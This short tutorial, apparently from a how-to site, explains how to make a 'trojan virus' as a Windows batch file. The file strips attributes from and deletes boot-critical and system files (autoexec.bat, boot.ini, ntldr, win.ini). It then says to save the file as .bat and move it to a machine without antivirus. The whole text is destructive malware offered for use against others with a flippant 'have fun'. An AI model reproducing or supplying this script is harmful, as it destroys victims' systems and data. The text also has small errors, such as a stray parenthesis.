Introduction: HOW TO CREATE TROJAN VIRUS THAT DELETES EVERYTHING IN WINDOWS

This simple tutorial will teach you how to code a simple trojan horse virus that will delete EVERYTHING in windows and delete the windows.ini file HAVE FUN AND DON'T GET IN TROUBLE USE THIS RESPONSIBLY

Step 1: Opening Notepad

Open Notepad

Then you want to type:

@echo off

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini)

Step 2: Saving...

Click File

Then Click Save As

Then Name It "Any Name.bat"

then click save

if it dont let you save save it as a text document then transfer it to a bat file on a pc without antivirus